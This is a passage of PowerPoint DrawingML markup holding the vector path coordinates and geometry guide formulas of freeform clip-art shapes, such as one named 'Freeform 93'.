                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9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12" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>
                  <a:gd name="T119" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>
                  <a:gd name="T183" fmla="*/ 112 h 11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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
